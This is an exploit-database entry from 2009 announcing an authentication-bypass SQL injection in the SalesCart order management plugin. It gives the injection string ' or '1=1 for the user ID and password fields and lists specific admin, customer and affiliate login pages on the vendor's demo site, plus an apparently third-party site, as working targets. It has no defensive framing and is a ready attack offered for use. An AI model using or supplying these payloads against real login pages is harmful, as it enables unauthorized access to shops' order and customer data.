SalesCart (Auth Bypass) SQL Injection Vulnerability

2009-01-30T00:00:00
ID 1337DAY-ID-4759
Type zdt
Reporter ByALBAYX
Modified 2009-01-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================
SalesCart (Auth Bypass) SQL Injection Vulnerability
===================================================



#############################################
[~]Script   :SalesCart Product Management Plugin

[~]Site     :http://www.salescart.com

[~]Demo     :http://www.salescart.com/scorderdemo/online/default.asp

[~]Details  :http://www.salescart.com/demo.htm
#############################################
Order Management Plugin

Create sales reports, invoices, labels, track fulfillment, export data, QuickBooks

[~]Working Demo

[~]http://www.salescart.com/scorderdemo/online/default.asp

[~]UserID   : ' or '1=1


[~]Password : ' or '1=1

[~]http://www.salescart.com/scorderdemo/online/customer/customer_login.asp

[~]Ship-to Email Address : [email protected]


[~]Password : ' or '1=1


[~]http://www.salescart.com/scorderdemo/online/affiliate/affiliate_login.asp

#############################################

[~]http://www.c4team.org/ [PATH] /default.asp


[~]UserID   : ' or '1=1


[~]Password : ' or '1=1


[~]vs... :D

#############################################



#  0day.today [2018-04-13]  #